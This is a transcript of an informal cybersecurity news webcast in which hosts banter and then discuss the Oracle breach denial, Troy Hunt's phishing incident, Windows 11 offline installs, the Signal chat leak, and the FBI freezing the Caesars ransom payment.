Ryan
Ryan, I think your audio is coming in from a different source.
Test Speaker
Test, test, test, test.
Ryan
Yours is fine.
Scroll Speaker
Scroll down.
Ryan
You don't. You don't sound as beautiful.
Scroll Speaker
You changed my setting on me.
Ralph May
Hold on.
Ryan
I knew it.
Unknown Speaker E
I kid you not. I already posted it to LinkedIn and I've had some wonderful replies. I have never gotten a coin before and I kid you not. This is awesome.
Ralph May
Look at that.
Unknown Speaker E
So amazingly awesome.
Ryan
That is awesome. Those coins came in midday the day before the conference. They almost didn't make it. Yeah, we thought we were gonna have to just hold on down for next year. To tell you the truth, I wasn't gonna ship them to you. That's too much work.
Unknown Speaker E
Yeah, but they say 2025.
Ralph May
Do they?
Ryan
Oh, then we would have been screwed. I didn't design the coins.
Unknown Speaker E
No, they say 2025. I've been the. The hardest part about deciphering the binary is typing all the ones and zeros accurately.
Ryan
You don't know what it says, so.
Unknown Speaker E
I do.
Ryan
Okay.
Unknown Speaker E
And no, I'm not going to tell you. Well, that would spoil it. Come on.
Scroll Speaker
Yeah, no spoilers.
Ryan
No spoilers, no spoilers.
Unknown Speaker F
Can you at least show us the other side of the coin so we can all try it at home and play along?
Unknown Speaker E
Well, one disadvantage is it is very, very shiny, so it doesn't show.
Unknown Speaker F
Okay. Oh, wow.
Scroll Speaker
I can tell what it says right now. It says, remember to drink your Ovaltine.
Unknown Speaker E
It's hexadecimal on the outside and it's binary on the inside. And it's all the. The yummy things.
Ryan
I will admit, Secure Ideas was there and they were giving away a Bambu Lab printer. If I don't win that printer, it's going to be.
Ralph May
Was it the new one they just dropped?
Ryan
No, no, it was the old. It was like the smallest one they had. But I'm like, yeah, okay, yeah, the $2,000 printer. Or then plus like the extra box that goes on top, which is like another 500 bucks.
Ralph May
The whole AMS.
Ryan
Yeah, dude, I want it.
Ralph May
Well, I have. The one behind me is the X one, right?
Ryan
Yeah.
Ralph May
You can't see them, but there's double AMSs. I got two AMSs on top right there. Yeah. But the new one is even bigger print volume. But the thing that makes it awesome is it has two print heads. So it's really awesome for multi-material printing and other kinds of, like, complex printing. Like, you can print stuff twice as fast and you can also do especially. It's really, really useful if you want to do removable. What do you call it supports. So what it'll do is one nozzle will print out the supports while the other one's printing the actual thing. It just. It makes it. That's why.
Ryan
Yeah, they were. They were printing up stuff at their booth and I couldn't believe how fast it was as compared to my. My Honda Civic of a Frankenstein 3D printer.
Ralph May
Yeah, I mean.
Unknown Speaker G
You.
Ralph May
You.
Ryan
Dude, that thing is put together with gum and a couple bolts. Like, I. There's a reason you guys don't see me printing anymore.
Ralph May
So that. That's a bed. The. The. The Bambu Lab and some of the other newer ones are core. Are CoreXY or CoreXYZ. Which. What happens is, is that with your bed slinger, they literally call it that because it slides back and forth to move. Well, the bed doesn't actually move in that direction. What happens is, is that the bed just raises up and then you have the core. CoreXYZ. So it. It does a lot. It prints a lot faster. Right. So.
Test Speaker
Ah, okay.
Ralph May
Yeah, it's a different way of printing. Not just that it moves faster. Um, so anywho, that.
Ryan
That one was still a bed slinger. It was whatever their smallest one is.
Ralph May
Yeah.
Ryan
And I do.
Ralph May
They do have one. Yeah, exactly.
Ryan
It was still lightning fast, like, and it was printing out some cool stuff, and I was like, this is stupid. Like, I hate myself. Why did I buy.
Ralph May
Yeah, I know. Oh, looks like we have a chicken story today.
Ryan
Oh, I really like Honda Civics too. All right. Honda Civics have their place. Especially if you're into JDM and you like fixing your own stuff. Okay, I. I had a Subaru. I know how blown up headed heads work, all right? I've trained transmissions. Why do you think I bought the Honda Civic 3D printer? I knew what I was getting into somewhat. And now I want the BMW where I don't have to do anything anymore and it just levels itself.
Scroll Speaker
That's not how BMWs work.
Ryan
Yeah, all right, that's a good point. That's a good point. I don't. I don't even know what kind of car works anymore.
Ralph May
Right?
Ryan
Like, and give me an.
Scroll Speaker
Edit the analogy backwards.
Test Speaker
Do any of us really. No.
Ralph May
You want the Apple. You want the Apple version, right?
Ryan
I'm not gonna say that. How dare you.
Ralph May
The one that kind of like, you know, just works, right?
Ryan
It just works. If you don't want to play video games is what it does. Right? What doesn't play?
Ralph May
Wow.
Ryan
I don't know. I haven't. I haven't used my work, sent me an Apple and a Windows box.
Ralph May
You can be playing all these beautiful video games. I'm just kidding. It's not really great.
Ryan
They said they sent me both. And I'm not gonna lie to you. Like, I logged into both, got them both working, and then I just stayed on the Windows box. I still have the Apple box. I tried to log into today, and I've realized I forgot the password. I'm too scared to tell anybody now I'm telling all you guys.
Ralph May
Have you not just told everybody that you.
Ryan
It's okay.
Ralph May
You can hack your way in?
Ryan
I. I remember because I have, like, my. My passwords are pretty complex, but I have, like, some matching characters, like, where they go to. And I remember Apple, like, saying that I couldn't do that. And so I, like, switched up the password, and I don't remember which one I switched it to.
Unknown Speaker G
I did that recently, too, where I'm like, what was in the password manager was not the right password? And I'm like, oh, crud. I just set this recently. I'm like, wait, I think I remember the password. And I tried it for memory. And I'm like, yep, memory password, let me back in. I am going to update that in the password manager because I cannot be using a password that I can just like it guess in two tries.
Ralph May
So here's what I do so I don't ever have to do that anymore. I just use the YubiKey, right? And there's two. Two reasons why you should consider this. Okay. Number one is that if you do a long press, it will just print out a password, right? Or just a long text, right? So if you have any device that you want to log into, you can just set it all to the same password. It's like 35 characters. You'll never be able to, you know, guess it or whatever, right? The second thing is that it. So it supports speed base, so PKI.
Ryan
Right?
Ralph May
And so what happens is, is when I plug this into a Mac, and also it works with Windows, it'll just ask for a PIN and then I unlock it. So I never actually have to use that. So then I always have my original password. The only thing I will say before you go all out there and get one, get two, because if this thing breaks, you heard like a real hurt locker for, like, how to get back in. So how about.
Ryan
I'm gonna go. I'm gonna go two ways with this. First, I set up biometrics, and for some reason, not letting me log in with a fingerprint. I don't know why I haven't opened a ticket or anything. So we'll figure that out later. The other thing is I have three of those and I have just haven't set anything up yet.
Ralph May
Nothing. Oh my God.
Ryan
I actually have.
Test Speaker
I'm not gonna lie, I have my second one on the way because I found out that popsicle juice from my daughter doesn't work with. So I got the definition of a sticky key.
Ralph May
Yeah, having three YubiKeys and not using them is like having three cars and walking to work pretty much.
Ryan
You know, I'm just like so tired of all this stuff. Like, I'm just like, I got just another thing I have to carry. I'm already doing all these things.
Ralph May
Yes.
Ryan
And then I have my home lab. I had a, had a RAM stick go bad in my home lab. That took me forever to figure out.
Ralph May
Ouch.
Ryan
Then I had to wait for Taiwan and like they shipped the new RAM from Taiwan. And then I was like, we just need to roll the finger. I need to get, to get out of this. I'm just going to dig myself into a deeper hole.
Ralph May
Oh, so somebody just brought this up before we jump into it. There's also the OnlyKey, which is another one of these key devices. This one just has a KEN to enter on it. It's kind of cool. So anyways, yeah, anyhow, let's roll that beautiful finger footage. Welcome to Black Hills Information Security. Talking about the news. I am your host today, Ralph May. And I have not read one single bit of these articles.
Ryan
As it should be. As it should be.
Ralph May
But I will say we do have a chicken article.
Ryan
Ah, that was the only one I read. That was the only article I read.
Unknown Speaker G
The one chicken article.
Test Speaker
Saved by the chicken.
Ralph May
Saved by the chicken. We also have some more ransomware. You know, the usual stuff. Breach the denial of the denial. We talked about it. We talked about it. We said these guys have been breached. They don't want to admit it. And guess what? Now they're going to have to admit it. So anyways, I am joined by an illustrious cast of many characters, including BSD Bandit who never shows up to the show. So welcome as well as our usual contestants here. So thank you all for joining us and thank you viewers for listening to me talk. I don't know, this is weird every time I think about it.
Ryan
So at the, at the conference this weekend, San Diego BSides, I was approached by several people asking for more chicken articles or claiming there needs to be more chicken articles. So here you go.
Scroll Speaker
Is that what we're starting with.
Ryan
Yeah, no, I wanna. Do you wanna start with it or end with it?
Ralph May
Starter. End with it. I don't know.
Ryan
Yeah, I feel like it's not a lot. It's not a lot, but it's.
Ralph May
There's.
Unknown Speaker G
Yeah, there's not gonna be.
Ralph May
Not much for a chicken article, right? Like, chicken and cyber security, like, going together. Unless they have, like, chicken AI or something. That sounds like something we should get on.
Unknown Speaker E
I could probably train an LLM to talk like Foghorn Leghorn.
Ralph May
Yeah.
Ryan
Well, I say. Well, I say.
Test Speaker
Interesting.
Ralph May
I say.
Test Speaker
I say. I say this is not AI, you know, nice program, but it has a mind like a steel trap. Like, these are things that you can literally, like, put out there. That would be interesting.
Ralph May
All right, so we'll come back to the chicken article. Do you guys want to start with this Oracle one? I felt like that one was kind of hot. And it's obviously the only one that actually had some backstory, too, so somebody else can lead. Last. I think it was last week, right, we talked about the Oracle security data breach, right? So what had happened happened was. If you hadn't listened to last week on one of the breach forums or whatever they're calling it, this week, there was a post about a data leak for Oracle, and they provided a bunch of credentials from their SSO. And Oracle was like, nah, man, that's not us. You know, they pretty much pulled the Shaggy defense and we kind of called it out. We were like, this will probably be real. And it does indeed look like it was real. Even though I think still to this day, Oracle's, like, kind of not acknowledging it. Right. What do you guys think here?
Ryan
They didn't acknowledge it. I thought they did. Did they or did they not? There's too many articles about this now.
Unknown Speaker G
I do like the one and I shared this one from. Yeah, I confused his name, but it's Kevin Beaumont, GossiTheDog. I always try to call him, like, Kevin Gossie, but.
Ralph May
Okay, okay, got it.
Unknown Speaker G
Yeah. And this was updated. And then they go, yeah, there's like, the archive.org exclusion process to remove evidence. They forgot to remove, like, the.
Ryan
Yeah, yeah, they go.
Unknown Speaker G
It's like, okay, so all these. All these threat actors, like, claims that they got access, they're trying to refute them, but then it's like, well, they're also trying to clean up the evidence. Then I saw from the. I think from when I dug into, like, the Finastra data breach in November, like, I noticed a thing on Breach Forums where prior basically, like right before and right after a threat actor will post their stuff, they will kind of delete and recreate their account so that it effectively on the forums, like purges all their history. So they'll go, oh, hey, here's me posting this with like one post. Is the, hey, I have all this information and there's been a history that like, well, a month ago you had 34 posts and 13 threads. And now that you post this, you have just this one post and then you go back in a week and that same user has no posts whatsoever. But they've rejoined just yesterday and they invited two other new users that join within a minute of the invite being sent out and both within a minute of each other. So you go, okay, so they're just really just rinsing and re. Repeating. They're rinsing their, their profile. So when. That's a long way to say when you're getting to that evidence of like, oh, we can't trust this because they only have like one post and they just. How do we know this is legit? It's like, yeah, a lot of like, you know, they burned down their account and then more than likely, if you dig into that user on Breach Forums and look at their invites, they more than likely just invited a new user that immediately joined and that's basically just them moving to a new account.
Ryan
Yeah.
Ralph May
So the other thing too is that there is definitely some more like facts coming out. And also Oracle is saying, all right, check this out, this one I loved. Oracle is saying that it wasn't compromised because Oracle rebranded Oracle Cloud to Oracle Classic now. And they're saying Oracle Cloud did not have an incident, but Oracle Classic did.
Ryan
So we can do that.
Ralph May
Making this up. Yes.
Unknown Speaker G
Wordsmithing. Wordsmithing is the theme of the week here, so we might get to that story. But wordsmithing things.
Ralph May
Yeah.
Unknown Speaker E
All right, well, word smithing or spin.
Unknown Speaker G
See, there you go. You're spinning the word smithing.
Test Speaker
It's like saying decaf and caffeinated. The decaf was compromised, but the caffeinated is still good.
Ryan
So I think I know the answer to this, but I want someone else to clarify if, if your company showed up in the breach and the data in this, what are some of the defensive or reactive controls that you should immediately take if, if your name were to pop up in that. Because I know there's a tool you can go and check to see if you're, if you're listed anywhere in this breach. Does anybody want to pipe up about that so I don't have to say it.
Ralph May
What, what, what should you do?
Ryan
Like, what, what should you do? What should you do if your name did get listed in the data that was in the breach?
Ralph May
Oh, I mean, panic run.
Ryan
No.
Ralph May
I mean, no. So, I mean, yeah, I'll take my stat, right? So look at resetting those accounts, right? Like, I mean, all of them, everything, right. And however those are being authenticated, I mean, let's just assume that they're all, all compromised and you should go through like an account reset for all of them.
Ryan
So that's all I wanted. That's exactly. I was going to say, just reset anything, any connections you ever have with NetSuite or Oracle or anything. Just, just hopefully you didn't do it on a Friday when payroll was ready to go, right?
Ralph May
That makes it worse.
Ryan
Maybe not.
Ralph May
Oh, yeah, that's. That's actually one of my sites is actually see, if you've been breached. You just have to enter your social mother's maiden name.
Unknown Speaker G
Like, you know, just a couple bits.
Test Speaker
Of information guaranteed you I will be.
Ralph May
Able to tell if you've been breached or not.
Ryan
Your first dog, the street you lived on.
Test Speaker
Send us all the information.
Ralph May
So what have we learned here? That Oracle is just as bad with security as they were 20 years ago. It's like they. Even worse now. They're like, just digging a hole. And they're like, no, I swear we're not digging a hole. And everyone's like, look, I see the hole. You're like, no, man, that's someone else's hole.
Unknown Speaker E
Are they actually worse or do we just have better visibility into when stuff happens with their stuff?
Ralph May
Is there a better marketplace for threat actors? Is that what you're trying to say?
Unknown Speaker E
No, I'm saying, I mean, it's like, okay, did. Did more of XYZ happen in the past or. Or in the present? Or is it just that now we hear about.
Test Speaker
Well, hold on, hold on.
Ralph May
So I think two things, right? So we're talking about, like, whether they have better or. Or worse security. And I'm actually not even saying they do or don't. I guess it's more of how they handle it. Like, usually they attack people that, you know, talk about some security thing or threaten to sue them or do whatever. And at this point they're like, well, we can't sue this person, so let's deny it. I mean, they literally went Shaggy defense, like all the way down the line.
Test Speaker
I do think, I do think they, they tend to hide it. They try to hide it more. I think the security.
Ralph May
Yeah, the.
Test Speaker
The lack of security is still the same. It's just that it's the. Like, the bar has. They're. They're more concerned about the image more so than just actually fixing things. I think it's just more so. And I think they went into panic mode when they actually did get breached. But, like, okay, we got it. We got to do damage control, like, right away. Because this is the era of cancel culture, as you know. And, you know, it's one bad thing gets out there about you. It kind of like runs its own narrative for, like, ever now. Now more than ever, no pun intended.
Unknown Speaker G
The initial narrative. That works because we've seen this. Like, we. I can. I'll name names. Like, yeah, when, like, Okta had the data breach and they're like, yeah, yeah, there's only like, 1% of customers were impacted. And they come back and they're like, wait, did we mean. Did we say 1%? We meant like 100%. So we actually. And it was like, they just didn't have. Yeah, they had, like, the selection, like, filters wrong. But there's been numerous companies that have done that to where they go, you know, it really only affects, like, a small percentage of our companies, of our customers. And then, you know, a week later, a couple of days later, it's like, well, no, it's much more significant that. Well, nobody really notices that secondary follow up of the. Oh, actually it affected, like, more, you know.
Ryan
Right.
Unknown Speaker G
An order of magnitude more than they initially said. I think we've also looked at this, like, you know, stock prices, customer confidence doesn't get impacted when they do something like that. Just lie right away or be deceptive right away. Wordsmith it right away and go, it wasn't a breach. Well, we don't know if it's a credible source. We're going to say that this is a highly discredited source. And so there was nothing that happened. And then you follow along with us or other intel feeds and you go, well, actually, it was a breach. Okay. You know, the. The narrative had been for, you know, five, four or five days now that it's like, it wasn't a breach.
Ryan
I want to. I want to. I want to point out there. Alex just called us an intel feed. We are not an intel feed.
Test Speaker
Oh, my goodness.
Unknown Speaker G
Or other intel.
Ryan
But that. That makes it assume that we are an intel feed. I would not say we are. We are. To me, satire. We are The Onion of cyber intel feeds.
Unknown Speaker G
For the first us, like, you need to up your, your threatened game.
Ralph May
Yeah, I, I think it's not if you're finding it out the first time, but if you're relying on us to tell you how to do about it. Yes, please don't, you know.
Ryan
Yeah, you could send payment to. No.
Unknown Speaker F
Does it, doesn't it seem though like the polar opposite of the way things were handled as like take Troy Hunt this week, for example. Right. I don't, I, I mean, I don't know if we're going to talk about that article or not, but, you know, you look at the way that was handled and it was handled within seconds, you know, like, like, because, you know, and I think I mentioned this before, but I follow Troy Hunt's, you know, his, his webcast on a really regular basis and I replayed it today and you know, his main concern was, oh my gosh, I want to notify my clientele before they hear it from anybody else. I want to get the real story out there so that they can take whatever precautions they need to do. And you know, it's like the polar opposite of what happened, you know, with the other story.
Ralph May
Yeah.
Unknown Speaker G
So what happened with Troy Hunt?
Ralph May
What's, what's this Mailchimp story? I have no idea.
Unknown Speaker F
Yeah, well, it was, it was just a phish it was in and he was jet lagged and you know, and of course I'm paraphrasing and not, you know, I don't mean to speak for it, but I, I did hear the stream today. So, you know, he, he was phished and he was, he was very lack of sleep. I think he just traveled across the continent and, and he just, it looked like something was a little amiss with his Mailchimp account. So he, he clicked on it. And, and I think to his defense too, he was saying that when he travels, you know, he uses the iPad. So the iPad doesn't display the URL like, like it would on the computer. And so, you know, and so yeah.
Unknown Speaker E
So that's one of the disadvantages to doing anything on mobile devices. I mean, if you're on a desktop, you can hover so you can inspect the URL before you click on it. But with mobile you don't have an equivalent feature or at least not one that I know of. If I'm wrong on that, I would love to know how to do it.
Ryan
And this is why you use a password.
Scroll Speaker
You can get that sometimes. It'll give you a preview of at least in emails. If you tap on iOS, if you tap and hold like the sender person. It should show you what that is. Not tap to click, but just on the name itself.
Unknown Speaker E
Yeah, see but that's fine motor control issue. And some of us have.
Scroll Speaker
That's, that's true.
Unknown Speaker E
Those of us are getting older have more fine motor control issues.
Ryan
This is the password manager, right? Like when you try to log in and the password manager doesn't recognize it, you're like, oh wait, wait a second. Like, why isn't. I'm not gonna lie, that happens all the time. And I still put the password in, but it definitely makes me look and try to realize it a little more.
Ralph May
Yeah, he talks about that in the article about how, you know, that should have saved him. But there's lots of sites where it doesn't fill it in so, you know, you just go look it up. And I've actually seen that before. I wish there was. That'd be a great feature for something like 1Password to, to, you know, let.
Ryan
You know that this not saying anything here doesn't look like legitimate.
Ralph May
But you know, I mean like, it's just supposed to be like an extra safety check as opposed to like the only way to prevent phishing. It's not, that's not really supposed to be what it's supposed to do, but it should, you know, be able to connect and be like, hey, this is typically where it logs in. You know, this looks, you know, maybe let's update it. This is the actual site. You know, that kind of thing.
Ryan
But I'm not, I'm pretty sure I.
Unknown Speaker G
Don't know 1Password.
Ryan
I'm pretty sure does that. It asks you if you want to. Are you sure you want to use this? It doesn't recognize this website.
Ralph May
Yeah. Okay.
Unknown Speaker E
It does have things built in.
Ralph May
Right?
Ryan
Okay.
Ralph May
I mean, you know, I use it all the time.
Test Speaker
What is this protection mania? Password. What? 1Password versus YubiKey. Like that's what we're doing. Password.
Ralph May
So anyways, kind of interesting article. I mean the, the kind of, the TL;DR here is that he got phished and the, the real thing lesson is that anyone can get phished, right?
Test Speaker
Yeah.
Ralph May
Even the guy looking for people doing phishing stuff. So kind of interesting. Definitely well respected in this kind of data breach and other kinds of things like that. So yeah, kind of interesting.
Test Speaker
We're all human.
Unknown Speaker G
Well, yeah, I think there's also like the takeaway that shows that you can't rely solely on user vigilance. Like the end user vigilance being like, okay, nobody's going to have a busy day. Nobody's going to be flying through their emails. Nobody's going to be jet lagged. And there are a lot of companies that their phishing defenses are exactly that with the we're going to do training, we're going to have user visual. It's like you should know better than to all four listen. No, you as security defenders like you need to put in place additional defenses for if your end user slips up. Because if you're strictly relying on user vigilance, you're going to get, you're going to get pwned just like try.
Test Speaker
Because it's kind of like a mechanism to kind of slow you down a little bit. Just to say as I kind of look at it as it's just kind of like, okay, this doesn't work. Okay, slow down. It's kind of like just telling you okay, slow down and make sure this is what you really want to do.
Ralph May
Right.
Test Speaker
It's kind of like when you want to delete something that says are you sure?
Ralph May
Like a speed bump. This is also. And he brings this up in the article, but this is also another great example where something like a Keepass would have prevented this entirely. And even with a phishing website that is totally legit and you're totally clicking all the links and you're trying to log in. As soon as you get to that part where you have to use your, you know, your Keepass, it's not going to work like and they're not going to be able to capture it no matter how advanced their infrastructure of capturing and man in the middling and all the other things. Right. So that is another great reason to use that on all the sites that do offer it. Right.
Unknown Speaker E
So ah, and there's the rub. That do offer it.
Ralph May
Yes, yes.
Unknown Speaker G
Mailchimp does not offer it.
Ralph May
Many other sites don't. Many sites have started to implement it though. And not for the security reasons. Some definitely for security reasons. But a lot of starting to implement it for the convenience. Right. Because you don't even need a username or a password. You can just present that key and they know exactly who you are. Yeah, exactly. So it's just faster way to log in actually. So anyhow, interesting. What else do we got?
Unknown Speaker G
I got one.
Ralph May
This is a short one. And if anybody else has other ones after this. But has anyone installed Windows 11 from scratch?
Ryan
Yes.
Ralph May
Okay, let me ask you this. Has anyone ever installed the Windows 11 without the Internet?
Ryan
Dude, I was trying to figure that out and it does not look possible.
Unknown Speaker F
I bypass that every time. I can't believe I'm not going to have that feature again.
Ralph May
Yeah, so there is a couple loopholes in how to install Windows 11 without the Internet and Microsoft being so benevolent is removing actually one of those. So now the only way is you have to actually use Shift+F10 and then you know, jump in the terminal command prompt. Excuse me. And had to add a registry key just to bypass it. So. And who knows how long that will last. But very frustrating if you have done this before, tried to install Windows 11 without the Internet or just to fight around the menu to get Windows 11 on a local account as opposed to adding a Microsoft account.
Ryan
That's the hard part, having that Microsoft account.
Test Speaker
I'll tell you one thing that going through that process made me take a nap. I mean. Yeah, it was brutal.
Unknown Speaker E
Yeah, I always like on my personal system, I always like creating a separate user just for things like games. I don't want my games to interfere with when I'm doing more serious stuff and you know, it keeps it away. I don't want to have to have my user, my main 365 user ID tied to that because it's separate. Otherwise what's the purpose of having it be separate?
Test Speaker
Yeah, that is true.
Ralph May
It is super annoying though that it's not like, you know, set up without the Internet. This one button, wouldn't that be easy?
Unknown Speaker G
Right?
Ralph May
Like, and now we have to like literally hack our way into installing Windows 11.
Test Speaker
I never thought I'd see the day.
Ryan
It's almost like we should all just move the Linux or something, right?
Unknown Speaker G
Arch Linux is going to become less accurate than the year of the Linux using Windows.
Test Speaker
Or if you want to be like the 11th person in the world that uses BSD, come on over. We welcome you with open arm.
Ralph May
I use, I use BSD. Well actually it's Unix. It's Mac. Mac is Unix-based.
Test Speaker
It is, it is.
Ralph May
And just if you want to get close to the where you know it all starts.
Test Speaker
That's always the running joke with FreeBSD. It's only 10 of you guys.
Unknown Speaker G
I mean it sounds like they just assign role. Like when you, when you use BSD. Like your BSD Bandit. Like somebody, they don't need to be the BSD Marshall. Yeah, that's.
Test Speaker
Yeah, the handles locked me in for life. Yes. So yes, there it is.
Ralph May
All right. You guys want to cook this chicken?
Ryan
Are we already at time? You want to. We're still got 30 minutes, right?
Ralph May
We'll leave it for the last article that's there. Give me something else then.
Ryan
Okay, let's do how the FBI tracked and froze millions sent to criminals. Is that the one? No. What were you going to say, Bronwyn? Which one do you want?
Unknown Speaker E
I was going to say, dare we tackle Signal Gate?
Ryan
This is a. Not political. I don't.
Ralph May
Yeah, it's super.
Unknown Speaker G
So just.
Ralph May
All right, all right. I'm gonna try this and just really high level. Right. So it. Try to keep the political piece as far out as I possibly can. Yeah, Just check it out. So you have Signal. Okay.
Unknown Speaker G
All right, cool.
Ralph May
And you start a chat with somebody. Yay. All right. And so that is encrypted.
Unknown Speaker G
Cool.
Ralph May
But if you accidentally add the wrong person to the chat, now they're in the chat, Right. So they can see what you see and that is encrypted. And they can only see what. They have perfect forward secrecy. So they can only see once you added them. But eventually. Right. If you don't realize they're in the chat and you say something that they shouldn't hear, then that's. That's how it works. Right. I mean, there's no security was broken here. Now the problem becomes is if you've got some really sensitive things that you should probably be not discussing and you happen to have a journalist. Right?
Unknown Speaker E
Yeah, the chief editor of.
Ralph May
Yes. And they may talk about this because they're a journalist. Why would they not? Right. So that's the whole story. Avoiding all political pieces. Right, right. That were in there, but literally that's it. So the moral is Signal cannot help you from making mistakes. User error, adding the wrong people to a chat, it will not prevent that. Right. And while Signal is very secure, it should not be used for really sensitive things because it's easy to add the wrong person. There you go.
Test Speaker
And to add a little bit. And at the end of the day, there's no patch for people.
Ralph May
Yeah.
Unknown Speaker G
Don't use Signal to get around record retention rules either. You have the compliance things that we all know here. If you need to retain emails for seven years, you're not going to put that stuff and say, you know what, that, that's too big of a problem. I'm just going to do all the stuff on Signal and delete it after, you know, four weeks. You know, four weeks or something.
Test Speaker
And this Signal situation should be a shout out to all messaging platforms.
Unknown Speaker G
Yep.
Test Speaker
Be mindful of who's in your chat. Be mindful of what you're saying. I mean, whether it's WhatsApp, Telegram, even iMessage.
Ralph May
Yeah, like be mindful who you got.
Test Speaker
Yeah, all of them.
Unknown Speaker E
It was a PEBKAC. It was a problem between a keyboard and a chair.
Ralph May
Yeah, Pretty much a phone.
Unknown Speaker E
One of the things I did like was how MalwareJake did a breakdown. I want to say it was for CNN, but I could be wrong. But I mean, he broke it down from the forensic standpoint. He also broke it down from the fact that in this specific case other more secure options were available. So it was not only a user error in terms of adding a wrong person in, it was also a procedural error in terms of not following an established policy. And that's something that. I know people, we run into it all the time. How many times have we discussed just today in this, this session how inconvenient good security can be? And yeah, it can be insecure, but you know, just because a secure tool doesn't provide the appropriate emojis, that's not an excuse to not use the secure.
Unknown Speaker F
Tool.
Unknown Speaker E
When it's appropriate to use that secure tool.
Test Speaker
So, you know, yeah, we didn't have enough cat emojis, so I just let the cat out the bag. I mean, just, you know, all right, not stickers.
Ryan
That's not MalwareJake. That's, that's Jacob.
Ralph May
Yeah.
Ryan
They called him Jacob. That's why. But nobody knows.
Unknown Speaker F
And not, not also, I think pseudo veggies put in the chat something to the fact that, you know, the, I mean the APTs in the, you know, in the telecoms. Right. So I know Signal's encrypted both ends, but you know, I think it was. There was a president, I don't know, I won't name the name. I know who it was, but who basically said, you know, everything I do, I do on my devices, I assume breach. Right, I assume breach. So I mean, we have to consider that as well.
Ralph May
I mean, yeah, so I mean other security people were also talking about like the device security itself. Right. And you know, these mobile. An iPhone, sure, you know, has a certain level of security, but there is nation state threat actors who definitely can compromise them. So, you know, it's still not really a secure device. Right. So anyhow, that's what happened. Don't be dumb. And you know, it makes it easier and follow the rules. Don't use it to get outside of retention policies. I think that's, you know.
Scroll Speaker
And wasn't there just like an FBI advisory about not using Signal? It came out roughly in the same time frame.
Ralph May
I think about not.
Unknown Speaker F
That was Signal.
Ryan
I thought it was SMS. Not using SMS.
Scroll Speaker
Not using SMS.
Ralph May
Okay.
Scroll Speaker
That's what it is.
Unknown Speaker G
Sorry no, there was something about the insecurities of Signal. There was something for Signal. You're thinking of the FBI did something for SMS messages. But I believe the Pentagon sent something agency wide about Signal. So you're both kind of right. There's a type of things in there with the jokes about, well, they sent him an email and who checks his email? I should have sent that notice about it.
Ralph May
You should have put that notice on Signal.
Unknown Speaker G
I would have totally on the group chat, you would have seen it.
Scroll Speaker
Seems like it's awful coincidence that that went out though.
Unknown Speaker G
Yeah.
Ryan
Days after Signaling, the Pentagon warned about the app. Yeah.
Ralph May
All right.
Ryan
I didn't see that. That more sounds like some people are you. Some like shadow IT. They're like, ah, we don't need to use the official Pentagon app. The Signal app is so much better.
Unknown Speaker G
Yeah, no, I, I remember and probably there's a lot of other people who remember this. Like you have any sort of like minor hiccup in a SCIF like that. That is, that is a problem. Like I, I did a base visit for a week and I was told not to come there one day because they're like, you weren't in this area, were you? And I'm like, no. And I'm like, okay, somebody left the SCIF door unlocked when they shut down at night. And it is like a big problem right now. But you go, it's like even with something like that oversight that they really clamped down on, it was like, well, first you have to get over the bridge to the base, get access to the base, get access to the building, get access to the room that goes before the SCIF and then get, and then, sure, your SCIF is unlocked. But it was like, heads are going to roll for this thing. And I'm seeing like more. And for proper reasons. Like they had a lot of emphasis on that, but I'm not seeing that here. And I hope there isn't any sort of like, you know, chilling effect on taking, you know, SCIF procedures seriously. If they, you know, if people are looking at, other than going, well, they did this and nothing came of it, what's the big deal for, you know, my, you know, minor transgressions on handling SCIF protocols or, you know, access.
Ralph May
It sounds like we're headed toward chicken, man.
Ryan
Let's talk about ransomware. We haven't got that, that deep into it. It's kind of a good, it's kind of a good, it's kind of a good feeling.
Ralph May
1.
Ryan
All right. Like the FBI did some things.
Ralph May
Oh, did they.
Ryan
And interesting.
Ralph May
All right, well, what'd they do?
Ryan
All right, so this article, the Caesars Entertainment hack, we all know about it, right? When they fell. What? I threw it in there.
Ralph May
No, I mean, I didn't know they got hacked. There's no way.
Ryan
Oh. Oh, okay. Anyway. Oh, it's a close one. BFF doesn't need any money from me, but. So when Scattered Spider got hit. Right. It goes over pretty much. How? Right off the bat, they actually asked for 30 million and Caesars gave 15 million. But the FBI was actually able to freeze it by talking to some of the wallet, some of the big whatever. Crypto holders as it was being moved around. Let me. Let me read my description. This is the only one I did read. The FBI acted swiftly to prevent the hackers from moving the ransom fund, successfully freezing this substantial amount when the criminals attempted to convert the crypto into other forms. So it did start as BTC, right? Which I found a little bit weird. I always think of different coins nowadays when any type of ransomware payments being made. But I guess BTC is probably the easiest one to get that much amount of that quickly. The FBI immediately hopped on it and got it all absolutely frozen. And showcasing their enhanced law enforcement capabilities.
Ralph May
Enhanced law.
Test Speaker
Enhance.
Ralph May
Enhanced.
Test Speaker
Enhance. Enhancing.
Ryan
So just remember, Bitcoin is not anonymous. There's plenty of cool tools out there that can actually track you and easily know where it's going.
Ralph May
Like Chainalysis. There's all kinds of opportunities to do there.
Ryan
Once again, it's not 2013.
Ralph May
Yeah, there's good mixers too. I mean, there's other.
Ryan
But like you.
Ralph May
Like you did say, though, it's kind of hard to get, you know, $30 million and you know, a Nana coin or whatever you want to call it, right?
Test Speaker
Yeah.
Ryan
Yeah, right. But hats off to Caesars too. It was a 30 million dollar ransom. They only had to pay 15. That's some good bargaining right there.
Ralph May
Yeah.
Unknown Speaker G
So, wait, I may have missed this, but was the FBI able to do this without having any sort of encryption backdoor that they need in order to solve crimes?
Ryan
So what I read is they were able. So the court documents state that the control. They tracked the cryptocurrency to a place called Ava Labs Inc. and requested them to immediately freeze the Bitcoin. It was 402.4 bitcoins in an Avalanche wallet.
Unknown Speaker G
Okay, well, maybe I was being a bit fastidious here because you see all these arguments that say we must have encryption backdoors because otherwise we won't be able to catch ripples like, we have to have encryption backdoors. They have to be there. You have to provide with some sort of backdoor so that we can do this. Otherwise, like, the criminals are just going to go nuts and we're not going to be able to do anything monetically. No, you can solve crimes without having encryption back doors. You can't stop cybercriminals without having encryption backdoors. Like, again, I think I said they just want the easy button. And here it is, like, you know, commendable. Absolutely commendable. Like web, like Wade said that they're able to find this type of information.
Ryan
What's XMR? What coin is that?
Ralph May
I want to say I got to.
Ryan
Right click and Google. It's Moreno. Okay, that's what I thought. They were also able to track it in Gate O another website, and when it was in Moreno and had them actually freeze currency too. So they were on the ball. So whoever was at Caesars that had that plan going to alert FBI. Monero. Yeah.
Ralph May
Yeah.
Ryan
Once again, like, when this type of stuff happens, having knowing your local agent or having at least that plan in place to actually talk to law enforcement can really help you out. Or at least make it so the bad guys don't win just as much. Right?
Test Speaker
It's a start. It's definitely a start. It's a good start. Hopefully we see more stories like this.
